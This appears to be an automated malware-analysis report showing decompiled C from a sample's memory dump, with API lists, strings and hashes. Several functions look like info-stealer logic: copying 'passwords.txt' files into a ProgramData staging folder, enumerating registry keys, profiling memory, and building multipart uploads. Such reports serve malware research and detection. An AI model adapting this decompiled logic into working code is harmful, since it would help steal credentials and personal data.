				intOrPtr _v132;
				signed int _t94;
				signed int _t95;
				int _t98;
				signed char _t120;
				signed char _t122;
				signed char _t123;
				signed char _t125;
				intOrPtr _t142;
				void* _t155;
				signed int _t195;
				intOrPtr _t217;
				void* _t223;
				void* _t224;
				signed int _t225;

				_t224 = __esi;
				_t223 = __edi;
				_t211 = __edx;
				_t155 = __ebx;
				_push(0xffffffff);
				_push(E00426522);
				_push( *[fs:0x0]);
				_t94 =  *0x4301f4; // 0x3b2bc12f
				_t95 = _t94 ^ _t225;
				_v20 = _t95;
				_push(_t95);
				 *[fs:0x0] =  &_v16;
				_v124 = __ecx;
				_t98 = CreateFileA(_a8, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v116 = _t98;
				if(_v116 != 0xffffffff) {
					_v56 = GetFileSize(_v116, 0);
					__eflags = _v56 - 1;
					if(_v56 >= 1) {
						E004011C0( &_v112, _a8);
						_v8 = 0;
						_v52 = E00401F10( &_v112, 0x5c, E00401350( &_v112) - 1) + 1;
						_v128 = E00401F30( &_v112,  &_v48, _v52, E00401350( &_v112) - _v52);
						_v132 = _v128;
						_v8 = 1;
						E00401E70( &_v112, _v132);
						_v8 = 0;
						E004012D0( &_v48);
						_v52 = E00401F10( &_v112, 0x2e, E00401350( &_v112) - 1) + 1;
						E00401F30( &_v112,  &_v84, _v52, E00401350( &_v112) - _v52);
						_v8 = 2;
						_t120 = E00402C70( &_v84, "jpg");
						__eflags = _t120 & 0x000000ff;
						if((_t120 & 0x000000ff) == 0) {
							_t122 = E00402C70( &_v84, "gif");
							__eflags = _t122 & 0x000000ff;
							if((_t122 & 0x000000ff) == 0) {
								_t123 = E00402C70( &_v84, "png");
								__eflags = _t123 & 0x000000ff;
								if((_t123 & 0x000000ff) == 0) {
									_t125 = E00402C70( &_v84, "tiff");
									__eflags = _t125 & 0x000000ff;
									if((_t125 & 0x000000ff) != 0) {
										_t125 = E00401EA0( &_v84, "image/tiff");
									}
								} else {
									_t125 = E00401EA0( &_v84, "image/png");
								}
							} else {
								_t125 = E00401EA0( &_v84, "image/gif");
							}
						} else {
							_t125 = E00401EA0( &_v84, "image/jpeg");
						}
						E00421740(_t125, _v124, "--");
						E00421740(E00421740(E00421740(E00421740(E00421740(_v124 + 0x10, _v124, _v124 + 0x10), _v124, "\r\n"), _v124, "Content-Disposition: form-data; name=\""), _v124, _a4), _v124, "\"; filename=\"");
						E00421740(E00421740(E00421740(E00401330( &_v112), _v124, _t134), _v124, "\"\r\n"), _v124, "Content-Type: ");
						E00421740(E00421740(E00421740(E00401330( &_v84), _v124, _t138), _v124, "\r\n"), _v124, "\r\n");
						_t217 = _v124;
						_t142 = _v124;
						__eflags =  *((intOrPtr*)(_t217 + 4)) -  *((intOrPtr*)(_t142 + 8)) - 1 - _v56;
						if( *((intOrPtr*)(_t217 + 4)) -  *((intOrPtr*)(_t142 + 8)) - 1 < _v56) {
							__eflags = _v56 -  *((intOrPtr*)(_v124 + 4)) -  *(_v124 + 8) - 1;
							E004214F0(_v124, _t223, _t224, _v56 -  *((intOrPtr*)(_v124 + 4)) -  *(_v124 + 8) - 1, _v56 -  *((intOrPtr*)(_v124 + 4)) -  *(_v124 + 8) - 1);
						}
						ReadFile(_v116,  *_v124 +  *(_v124 + 8), _v56,  &_v120, 0); // executed
						_t195 =  *(_v124 + 8) + _v120;
						__eflags = _t195;
						_t211 = _v124;
						 *(_v124 + 8) = _t195;
						E00421740(CloseHandle(_v116), _v124, "\r\n");
						_v8 = 0;
						E004012D0( &_v84);
						_v8 = 0xffffffff;
						_t98 = E004012D0( &_v112);
					} else {
						_t211 = _v116;
						_t98 = CloseHandle(_v116);
					}
				}
				 *[fs:0x0] = _v16;
				return E00404354(_t98, _t155, _v20 ^ _t225, _t211, _t223, _t224);
			}

0x004218c0
0x004218c0
0x004218c0
0x004218c0
0x004218c3
0x004218c5
0x004218d0
0x004218d4
0x004218d9
0x004218db
0x004218de
0x004218e2
0x004218e8
0x00421901
0x00421907
0x0042190e
0x00421921
0x00421924
0x00421928
0x00421940
0x00421945
0x00421965
0x00421984
0x0042198a
0x0042198d
0x00421998
0x0042199d
0x004219a4
0x004219c2
0x004219dc
0x004219e1
0x004219ee
0x004219f9
0x004219fb
0x00421a15
0x00421a20
0x00421a22
0x00421a3c
0x00421a47
0x00421a49
0x00421a63
0x00421a6e
0x00421a70
0x00421a7a
0x00421a7a
0x00421a4b
0x00421a53
0x00421a53
0x00421a24
0x00421a2c
0x00421a2c
0x004219fd
0x00421a05
0x00421a05
0x00421a87
0x00421ac9
0x00421af4
0x00421b1f
0x00421b24
0x00421b27
0x00421b33
0x00421b36
0x00421b4a
0x00421b50
0x00421b50
0x00421b6f
0x00421b7b
0x00421b7b
0x00421b7e
0x00421b81
0x00421b96
0x00421b9b
0x00421ba2
0x00421ba7
0x00421bb1
0x0042192a
0x0042192a
0x0042192e
0x0042192e
0x00421928
0x00421bb9
0x00421bce

APIs

CreateFileA.KERNEL32(00421212,80000000,00000001,00000000,00000003,00000080,00000000,3B2BC12F), ref: 00421901
GetFileSize.KERNEL32(000000FF,00000000), ref: 0042191B
CloseHandle.KERNEL32(000000FF), ref: 0042192E

Strings

tiff, xrefs: 00421A5A
image/gif, xrefs: 00421A24
png, xrefs: 00421A33
", xrefs: 00421ADF
Content-Disposition: form-data; name=", xrefs: 00421AA8
"; filename=", xrefs: 00421AC1
image/tiff, xrefs: 00421A72
gif, xrefs: 00421A0C
image/jpeg, xrefs: 004219FD
image/png, xrefs: 00421A4B
jpg, xrefs: 004219E5
Content-Type: , xrefs: 00421AEC

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: "$"; filename="$Content-Disposition: form-data; name="$Content-Type: $gif$image/gif$image/jpeg$image/png$image/tiff$jpg$png$tiff
API String ID: 1378416451-1458791827
Opcode ID: 10895f6d1539fab828b2433fc796608f0f92dbda97f91a4d645635c244f2a767
Instruction ID: 3bf615faab60dab94f8dcf7d9beea4d0e9600496abd0152c7296f5e1fc8068ae
Opcode Fuzzy Hash: 10895f6d1539fab828b2433fc796608f0f92dbda97f91a4d645635c244f2a767
Instruction Fuzzy Hash: 9E918E71A04118ABDB14EBA5EC91FEDB775BF54304FA0412EF402BB2E2DB786905CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC90, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 158
registryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0041AC90(void* __ebx, void* __edi, void* __esi) {
				int _v8;
				signed int _v12;
				char _v1036;
				char _v2060;
				void* _v2064;
				void* _v2068;
				int* _v2072;
				int _v2076;
				char _v3100;
				char _v203100;
				char* _v203104;
				int _v203108;
				intOrPtr* _v203112;
				intOrPtr _v203116;
				char _v203117;
				intOrPtr _v203124;
				signed int _t66;
				long _t71;
				char* _t73;
				long _t76;
				long _t80;
				long _t82;
				long _t89;
				void* _t98;
				char* _t99;
				char* _t108;
				char* _t115;
				void* _t128;
				void* _t129;
				signed int _t130;
				void* _t131;
				void* _t132;

				_t129 = __esi;
				_t128 = __edi;
				_t98 = __ebx;
				E00412A40(0x31970);
				_t66 =  *0x4301f4; // 0x3b2bc12f
				_v12 = _t66 ^ _t130;
				E004091C0( &_v203100, 0, 0x30d40);
				_t132 = _t131 + 0xc;
				_v2068 = 0;
				_v2064 = 0;
				_t99 =  *0x43244c; // 0xc174c0
				_v203104 = _t99;
				_v2072 = 0;
				_v8 = 0xf003f;
				_v2076 = 0;
				_t117 =  &_v2068;
				_t71 = RegOpenKeyExA(0x80000002, _v203104, 0, 0x20019,  &_v2068); // executed
				if(_t71 == 0) {
					_v203108 = 0;
					while(_v2072 == 0) {
						_v2076 = 0x400;
						_t76 = RegEnumKeyExA(_v2068, _v203108,  &_v1036,  &_v2076, 0, 0, 0, 0); // executed
						_v2072 = _t76;
						if(_v2072 != 0) {
							L16:
							_v203108 = _v203108 + 1;
							continue;
						} else {
							wsprintfA( &_v2060, "%s\\%s", _v203104,  &_v1036);
							_t132 = _t132 + 0x10;
							_t80 = RegOpenKeyExA(0x80000002,  &_v2060, 0, 0x20019,  &_v2064); // executed
							if(_t80 == 0) {
								_v2076 = 0x400;
								_t108 =  *0x432678; // 0xc16950
								_t82 = RegQueryValueExA(_v2064, _t108, 0,  &_v8,  &_v3100,  &_v2076); // executed
								if(_t82 == 0) {
									_v203112 =  &_v3100;
									_v203116 = _v203112 + 1;
									do {
										_v203117 =  *_v203112;
										_v203112 = _v203112 + 1;
									} while (_v203117 != 0);
									_v203124 = _v203112 - _v203116;
									if(_v203124 > 1) {
										 *0x4328c4( &_v203100,  &_v3100);
										_v2076 = 0x400;
										_t115 =  *0x432418; // 0xc168c0
										_t89 = RegQueryValueExA(_v2064, _t115, 0,  &_v8,  &_v3100,  &_v2076); // executed
										if(_t89 == 0) {
											 *0x4328c4( &_v203100, " ");
											 *0x4328c4( &_v203100,  &_v3100);
										}
										 *0x4328c4( &_v203100, "\n");
									}
								}
								RegCloseKey(_v2064);
								goto L16;
							} else {
								_t117 = _v2064;
								RegCloseKey(_v2064);
								RegCloseKey(_v2068);
								_t73 =  &_v203100;
							}
						}
						goto L18;
					}
					_t117 = _v2068;
					RegCloseKey(_v2068);
					_t73 =  &_v203100;
				} else {
					_t73 =  &_v203100;
				}
				L18:
				return E00404354(_t73, _t98, _v12 ^ _t130, _t117, _t128, _t129);
			}

0x0041ac90
0x0041ac90
0x0041ac90
0x0041ac98
0x0041ac9d
0x0041aca4
0x0041acb5
0x0041acba
0x0041acbd
0x0041acc7
0x0041acd1
0x0041acd7
0x0041acdd
0x0041ace7
0x0041acee
0x0041acf8
0x0041ad12
0x0041ad1a
0x0041ad27
0x0041ad42
0x0041ad4f
0x0041ad7d
0x0041ad83
0x0041ad90
0x0041af23
0x0041ad3c
0x00000000
0x0041ad96
0x0041adb0
0x0041adb6
0x0041add3
0x0041addb
0x0041ae02
0x0041ae20
0x0041ae2e
0x0041ae36
0x0041ae42
0x0041ae51
0x0041ae57
0x0041ae5f
0x0041ae65
0x0041ae6c
0x0041ae81
0x0041ae8e
0x0041aea2
0x0041aea8
0x0041aec6
0x0041aed4
0x0041aedc
0x0041aeea
0x0041aefe
0x0041aefe
0x0041af10
0x0041af10
0x0041ae8e
0x0041af1d
0x00000000
0x0041addd
0x0041addd
0x0041ade4
0x0041adf1
0x0041adf7
0x0041adf7
0x0041addb
0x00000000
0x0041ad90
0x0041af28
0x0041af2f
0x0041af35
0x0041ad1c
0x0041ad1c
0x0041ad1c
0x0041af3b
0x0041af48

APIs

_memset.LIBCMT ref: 0041ACB5
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,00000000), ref: 0041AD12
RegEnumKeyExA.KERNEL32(00000000,?,?,00000400,00000000,00000000,00000000,00000000), ref: 0041AD7D
wsprintfA.USER32 ref: 0041ADB0
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0041ADD3
RegCloseKey.ADVAPI32(?), ref: 0041ADE4
RegCloseKey.ADVAPI32(?), ref: 0041ADF1

Strings

?, xrefs: 0041ACE7
%s\%s, xrefs: 0041ADA4

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseOpen$Enum_memsetwsprintf
String ID: %s\%s$?
API String ID: 1655683433-4134130046
Opcode ID: c28af84634dd7fe829f9369c149b5434bdfd4557512f268f8a92ba82151ecc8b
Instruction ID: 3ed3947afa43b3b00520fc6f230ae1a40cab295c59359ce42977ca459933d7fa
Opcode Fuzzy Hash: c28af84634dd7fe829f9369c149b5434bdfd4557512f268f8a92ba82151ecc8b
Instruction Fuzzy Hash: 0B614CB590122C9BDB25DF50DD94BE9B7BDFF48304F0081EAE249A6240DB745AC9CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00424D00, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 79
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00424D00(void* __ebx, CHAR* __edx, void* __edi, void* __esi, void* __eflags, CHAR* _a8, intOrPtr _a12, intOrPtr _a20) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				char _v540;
				signed int _t21;
				intOrPtr _t25;
				void* _t41;
				intOrPtr _t54;
				signed int _t58;
				void* _t59;
				void* _t60;

				_t57 = __esi;
				_t56 = __edi;
				_t51 = __edx;
				_t42 = __ebx;
				_t21 =  *0x4301f4; // 0x3b2bc12f
				_v12 = _t21 ^ _t58;
				SetCurrentDirectoryA(_a8); // executed
				_t25 = E004043DF(__ebx, _t51, __edi, __esi, _a12, 0x431e70); // executed
				_t60 = _t59 + 8;
				_v8 = _t25;
				if(_v8 != 0xffffffff) {
					do {
						E004091C0( &_v540, 0, 0x104);
						E004091C0( &_v276, 0, 0x104);
						 *0x4328c4( &_v540, _a8);
						 *0x4328c4( &_v540, "passwords.txt");
						 *0x4328c4( &_v276, "C:\\ProgramData\\734573140483756");
						_t54 =  *0x4320c4; // 0xc176d8
						 *0x4328c4( &_v276, _t54);
						 *0x4328c4( &_v276, _a20);
						 *0x4328c4( &_v276, "passwords.txt");
						_t51 =  &_v540;
						CopyFileA( &_v540,  &_v276, 1); // executed
						_t41 = E00404506(__ebx,  &_v540, __edi, __esi, _v8, 0x431e70); // executed
						_t60 = _t60 + 0x20;
					} while (_t41 == 0);
					_t25 = E00404634(_v8);
				}
				return E00404354(_t25, _t42, _v12 ^ _t58, _t51, _t56, _t57);
			}

0x00424d00
0x00424d00
0x00424d00
0x00424d00
0x00424d09
0x00424d10
0x00424d17
0x00424d26
0x00424d2b
0x00424d2e
0x00424d35
0x00424d3b
0x00424d49
0x00424d5f
0x00424d72
0x00424d84
0x00424d96
0x00424d9c
0x00424daa
0x00424dbb
0x00424dcd
0x00424ddc
0x00424de3
0x00424df2
0x00424df7
0x00424dfa
0x00424e06
0x00424e0b
0x00424e1b

APIs

SetCurrentDirectoryA.KERNEL32(00424F3F), ref: 00424D17
__findfirst64i32.LIBCMT ref: 00424D26
_memset.LIBCMT ref: 00424D49
_memset.LIBCMT ref: 00424D5F
lstrcat.KERNEL32(?,00424F3F), ref: 00424D72
lstrcat.KERNEL32(?,passwords.txt), ref: 00424D84
lstrcat.KERNEL32(?,C:\\ProgramData\\734573140483756), ref: 00424D96
lstrcat.KERNEL32(?,00C176D8), ref: 00424DAA
lstrcat.KERNEL32(?,00424EE3), ref: 00424DBB
lstrcat.KERNEL32(?,passwords.txt), ref: 00424DCD
CopyFileA.KERNEL32(?,?,00000001), ref: 00424DE3
__findnext64i32.LIBCMT ref: 00424DF2

Strings

passwords.txt, xrefs: 00424D78, 00424DC1
C:\\ProgramData\\734573140483756, xrefs: 00424D8A

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$_memset$CopyCurrentDirectoryFile__findfirst64i32__findnext64i32
String ID: C:\\ProgramData\\734573140483756$passwords.txt
API String ID: 844519491-1023284806
Opcode ID: e7f05cfdac8478aabc2ed35e95e0e28842fb9a9b9d53bf89e4aab547a3be5951
Instruction ID: 0a98c26ee22be9fba806c266b3a98fbd47b499360a5eee5ad6601350f0339ea8
Opcode Fuzzy Hash: e7f05cfdac8478aabc2ed35e95e0e28842fb9a9b9d53bf89e4aab547a3be5951
Instruction Fuzzy Hash: A6218CB290021CABCB18EBA0DD8AEDD7378AB5C301F0456A9F716571D0DBB49A88CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041DCA0, Relevance: 19.8, APIs: 13, Instructions: 286stringfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041DCBF
lstrcat.KERNEL32(?,00C16718), ref: 0041DCD3
CopyFileA.KERNEL32(?,?,00000001), ref: 0041DCE6
_memset.LIBCMT ref: 0041DCFA
wsprintfA.USER32 ref: 0041DD18
DeleteFileA.KERNEL32(?), ref: 0041E0C6

Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8

lstrcat.KERNEL32(?,00C167A8), ref: 0041DECF
lstrcat.KERNEL32(?,00C167B8), ref: 0041DEEF
lstrcat.KERNEL32(?,00C167A8), ref: 0041DFA1
lstrcat.KERNEL32(?,00C167B8), ref: 0041DFC0
lstrcat.KERNEL32(?,00429CCC), ref: 0041DFEA
_fprintf.LIBCMT ref: 0041E06D
_fprintf.LIBCMT ref: 0041E089

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memsetwsprintf
String ID:
API String ID: 3836584492-0
Opcode ID: d8b20109aa66b115ba5ea3117337ceb65497a12725fdff501180ec977d61706c
Instruction ID: c88c65ffe1260dd4c76004f7af897511baf4b03775390616ead9ee4b2e68dc4a
Opcode Fuzzy Hash: d8b20109aa66b115ba5ea3117337ceb65497a12725fdff501180ec977d61706c
Instruction Fuzzy Hash: BDC10CB1E042189FCB64DF68DD88BDEB7B5EB48301F0482E9E509A7290D7759E84CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00414DA0, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 204
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00414DA0(void* __ebx, signed int __edx, void* __edi, void* __esi, void* _a4, signed int* _a8, signed int _a12, intOrPtr* _a16, signed int* _a20) {
				int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				signed int _v24;
				intOrPtr _v52;
				intOrPtr _v60;
				signed int _v68;
				struct _BY_HANDLE_FILE_INFORMATION _v76;
				long _v80;
				void _v84;
				void _v88;
				void _v92;
				signed short _v96;
				signed short _v100;
				signed int _t89;
				int _t92;
				void* _t102;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t112;
				void* _t130;
				intOrPtr* _t145;
				intOrPtr _t146;
				intOrPtr _t147;
				intOrPtr _t167;
				intOrPtr _t168;
				void* _t177;
				void* _t178;
				signed int _t179;
				void* _t180;

				_t178 = __esi;
				_t177 = __edi;
				_t158 = __edx;
				_t130 = __ebx;
				_t89 =  *0x4301f4; // 0x3b2bc12f
				_v24 = _t89 ^ _t179;
				_t92 = GetFileInformationByHandle(_a4,  &_v76); // executed
				_v8 = _t92;
				if(_v8 != 0) {
					_v16 = _v76.dwFileAttributes;
					_v12 = 0;
					if((_v16 & 0x00000001) != 0) {
						_v12 = _v12 | 0x00000001;
					}
					if((_v16 & 0x00000002) != 0) {
						_v12 = _v12 | 0x00000002;
					}
					if((_v16 & 0x00000004) != 0) {
						_v12 = _v12 | 0x00000004;
					}
					if((_v16 & 0x00000010) != 0) {
						_v12 = _v12 | 0x00000010;
					}
					if((_v16 & 0x00000020) != 0) {
						_v12 = _v12 | 0x00000020;
					}
					if((_v16 & 0x00000010) == 0) {
						_v12 = _v12 | 0x80000000;
					} else {
						_v12 = _v12 | 0x40000000;
					}
					_v12 = _v12 | 0x01000000;
					_t158 = _v16 & 0x00000001;
					if((_v16 & 0x00000001) == 0) {
						_v12 = _v12 | 0x00800000;
					}
					_v80 = GetFileSize(_a4, 0);
					if(_v80 > 0x28) {
						SetFilePointer(_a4, 0, 0, 0); // executed
						ReadFile(_a4,  &_v84, 2,  &_v20, 0); // executed
						SetFilePointer(_a4, 0x24, 0, 0); // executed
						_t158 =  &_v88;
						ReadFile(_a4,  &_v88, 4,  &_v20, 0); // executed
						if((_v84 & 0x0000ffff) == 0x54ad) {
							_t158 = _v88 + 0x34;
							if(_v80 > _v88 + 0x34) {
								SetFilePointer(_a4, _v88, 0, 0);
								_t158 =  &_v20;
								ReadFile(_a4,  &_v92, 4,  &_v20, 0);
								if(_v92 == 0x5a4d || _v92 == 0x454e || _v92 == 0x454c || _v92 == 0x4550) {
									_t158 = _v12 | 0x00400000;
									_v12 = _v12 | 0x00400000;
								}
							}
						}
					}
					if(_a8 != 0) {
						 *_a8 = _v12;
					}
					if(_a12 != 0) {
						_t158 = _a12;
						 *_a12 = _v80;
					}
					if(_a16 != 0) {
						_t167 = _v76.ftLastAccessTime;
						_t108 = E00412F70(_t167, _v60);
						_t145 = _a16;
						 *_t145 = _t108;
						 *((intOrPtr*)(_t145 + 4)) = _t167;
						_t168 = _v52;
						_t110 = E00412F70(_v76.ftLastWriteTime, _t168);
						_t146 = _a16;
						 *((intOrPtr*)(_t146 + 8)) = _t110;
						 *((intOrPtr*)(_t146 + 0xc)) = _t168;
						_t158 = _v68;
						_t112 = E00412F70(_v76.ftCreationTime, _t158);
						_t180 = _t180 + 0x18;
						_t147 = _a16;
						 *((intOrPtr*)(_t147 + 0x10)) = _t112;
						 *(_t147 + 0x14) = _t158;
					}
					if(_a20 != 0) {
						E00412EB0(_v76.ftLastWriteTime, _v52,  &_v100,  &_v96);
						_t158 = _a20;
						 *_a20 = _v96 & 0x0000ffff | (_v100 & 0x0000ffff) << 0x00000010;
					}
					_t102 = 0;
					goto L35;
				} else {
					_t102 = 0x200;
					L35:
					return E00404354(_t102, _t130, _v24 ^ _t179, _t158, _t177, _t178);
				}
			}

0x00414da0
0x00414da0
0x00414da0
0x00414da0
0x00414da6
0x00414dad
0x00414db8
0x00414dbe
0x00414dc5
0x00414dd4
0x00414dd7
0x00414de4
0x00414dec
0x00414dec
0x00414df5
0x00414dfd
0x00414dfd
0x00414e06
0x00414e0e
0x00414e0e
0x00414e17
0x00414e1f
0x00414e1f
0x00414e28
0x00414e30
0x00414e30
0x00414e39
0x00414e51
0x00414e3b
0x00414e44
0x00414e44
0x00414e5d
0x00414e63
0x00414e66
0x00414e72
0x00414e72
0x00414e81
0x00414e88
0x00414e98
0x00414eae
0x00414ebe
0x00414ecc
0x00414ed4
0x00414ee4
0x00414ee9
0x00414eef
0x00414efd
0x00414f05
0x00414f13
0x00414f20
0x00414f40
0x00414f46
0x00414f46
0x00414f20
0x00414eef
0x00414ee4
0x00414f4d
0x00414f55
0x00414f55
0x00414f5b
0x00414f5d
0x00414f63
0x00414f63
0x00414f69
0x00414f6f
0x00414f73
0x00414f7b
0x00414f7e
0x00414f80
0x00414f83
0x00414f8b
0x00414f93
0x00414f96
0x00414f99
0x00414f9c
0x00414fa4
0x00414fa9
0x00414fac
0x00414faf
0x00414fb2
0x00414fb2
0x00414fb9
0x00414fcb
0x00414fe0
0x00414fe3
0x00414fe3
0x00414fe5
0x00000000
0x00414dc7
0x00414dc7
0x00414fe7
0x00414ff4
0x00414ff4

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 00414DB8
GetFileSize.KERNEL32(00000000,00000000), ref: 00414E7B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00414E98
ReadFile.KERNEL32(00000000,?,00000002,?,00000000), ref: 00414EAE
SetFilePointer.KERNEL32(00000000,00000024,00000000,00000000), ref: 00414EBE
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 00414ED4
SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 00414EFD

Strings

(, xrefs: 00414E84
PE, xrefs: 00414F34

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Pointer$Read$HandleInformationSize
String ID: ($PE
API String ID: 4143101051-3347799738
Opcode ID: 73688f45af0be80ef4f12a2f87dfdc21f3fcb5f8b722a710a9cf8febf1ec73ac
Instruction ID: c5050f7acb5cbcbc28ed86ef46dc34b2836c810015344e94891c9d8cc76daef6
Opcode Fuzzy Hash: 73688f45af0be80ef4f12a2f87dfdc21f3fcb5f8b722a710a9cf8febf1ec73ac
Instruction Fuzzy Hash: 26813B71E10208EFDB14CFD4D895BEEBBB5FB88304F14845AE505AB384D7749A85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041B340, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 71
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041B340(void* __ebx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _v8;
				signed int _v12;
				char _v276;
				unsigned int _v280;
				intOrPtr _v336;
				intOrPtr _v340;
				char _v348;
				struct _MEMORYSTATUS _v380;
				signed int _t29;
				CHAR* _t31;
				struct _MEMORYSTATUSEX* _t40;
				void* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t54;
				void* _t55;
				signed int _t56;
				void* _t57;

				_t55 = __esi;
				_t54 = __edi;
				_t42 = __ebx;
				_t29 =  *0x4301f4; // 0x3b2bc12f
				_v12 = _t29 ^ _t56;
				_t31 =  *0x4320dc; // 0xc182c0
				_t43 =  *0x43243c; // 0xc16920
				_v8 = GetProcAddress(LoadLibraryA(_t43), _t31);
				if(_v8 != 0) {
					E004091C0( &_v348, 0, 0x40);
					_t57 = _t57 + 0xc;
					_v348 = 0x40;
					_t40 =  &_v348;
					GlobalMemoryStatusEx(_t40);
					if(_t40 != 1) {
						_v8 = 0;
					} else {
						_v280 = E0040E2D0(_v340, _v336, 0x100000, 0);
					}
				}
				if(_v8 == 0) {
					_v380.dwLength = 0;
					_v380.dwMemoryLoad = 0;
					_v380.dwTotalPhys = 0;
					_v380.dwAvailPhys = 0;
					_v380.dwTotalPageFile = 0;
					_v380.dwAvailPageFile = 0;
					_v380.dwTotalVirtual = 0;
					_v380.dwAvailVirtual = 0;
					_v380.dwLength = 0x20;
					GlobalMemoryStatus( &_v380);
					_v280 = _v380.dwTotalPhys >> 0x14;
				}
				_t44 =  *0x4321d4; // 0xc167c8
				wsprintfA( &_v276, _t44, _v280);
				return E00404354( &_v276, _t42, _v12 ^ _t56,  &_v276, _t54, _t55);
			}

0x0041b340
0x0041b340
0x0041b340
0x0041b349
0x0041b350
0x0041b353
0x0041b359
0x0041b36d
0x0041b374
0x0041b381
0x0041b386
0x0041b389
0x0041b393
0x0041b39a
0x0041b3a0
0x0041b3c4
0x0041b3a2
0x0041b3bc
0x0041b3bc
0x0041b3a0
0x0041b3cf
0x0041b3d3
0x0041b3d9
0x0041b3df
0x0041b3e5
0x0041b3eb
0x0041b3f1
0x0041b3f7
0x0041b3fd
0x0041b403
0x0041b414
0x0041b423
0x0041b423
0x0041b430
0x0041b43e
0x0041b45a

APIs

LoadLibraryA.KERNEL32(00C16920,00C182C0), ref: 0041B360
GetProcAddress.KERNEL32(00000000), ref: 0041B367
_memset.LIBCMT ref: 0041B381
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 0041B39A
__aulldiv.LIBCMT ref: 0041B3B7
GlobalMemoryStatus.KERNEL32 ref: 0041B414
wsprintfA.USER32 ref: 0041B43E

Strings

, xrefs: 0041B403
@, xrefs: 0041B389

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: GlobalMemoryStatus$AddressLibraryLoadProc__aulldiv_memsetwsprintf
String ID: $@
API String ID: 2652395207-1077428164
Opcode ID: 5d1e5206044d7470bcd509b6d8c798ef7ed0ea355bbd83c6af05cda44b111c2d
Instruction ID: db4982e13e79d3db6745d5f0cfa83d5bf5defc0fd26a34047e2e0df123a5a917
Opcode Fuzzy Hash: 5d1e5206044d7470bcd509b6d8c798ef7ed0ea355bbd83c6af05cda44b111c2d
Instruction Fuzzy Hash: 2731E3B0D04218EFCB64DFA4DD49BDEB7B8AB48304F4045EAE60DA6280EB745A84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00424E20, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
stringCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00424E20(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				char _v540;
				signed int _t17;
				intOrPtr _t26;
				void* _t32;
				signed int _t49;
				void* _t55;

				_t55 = __eflags;
				_t17 =  *0x4301f4; // 0x3b2bc12f
				_v8 = _t17 ^ _t49;
				E004091C0( &_v276, 0, 0x104);
				E0041A380( &_v276, 0x1a); // executed
				 *0x4328c4( &_v276, _a8);
				E004091C0( &_v540, 0, 0x104);
				 *0x4328c4( &_v540, "C:\\ProgramData\\734573140483756");
				_t26 =  *0x4320c4; // 0xc176d8
				 *0x4328c4( &_v540, _t26);
				 *0x4328c4(_a4);
				CreateDirectoryA( &_v540, 0); // executed
				_t32 = E00424D00(__ebx,  &_v276, __edi, __esi, _t55, 0x4294ed,  &_v276, _a12, _a8, _a4); // executed
				return E00404354(_t32, __ebx, _v8 ^ _t49,  &_v276, __edi, __esi,  &_v540);
			}

0x00424e20
0x00424e29
0x00424e30
0x00424e41
0x00424e52
0x00424e65
0x00424e79
0x00424e8d
0x00424e93
0x00424ea0
0x00424eb1
0x00424ec0
0x00424ede
0x00424ef3

APIs

_memset.LIBCMT ref: 00424E41

Part of subcall function 0041A380: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0041A39D

lstrcat.KERNEL32(?,00C17738), ref: 00424E65
_memset.LIBCMT ref: 00424E79
lstrcat.KERNEL32(?,C:\\ProgramData\\734573140483756), ref: 00424E8D
lstrcat.KERNEL32(?,00C176D8), ref: 00424EA0
lstrcat.KERNEL32(?,00C17738), ref: 00424EB1
CreateDirectoryA.KERNEL32(?,00000000), ref: 00424EC0

Part of subcall function 00424D00: SetCurrentDirectoryA.KERNEL32(00424F3F), ref: 00424D17
Part of subcall function 00424D00: __findfirst64i32.LIBCMT ref: 00424D26
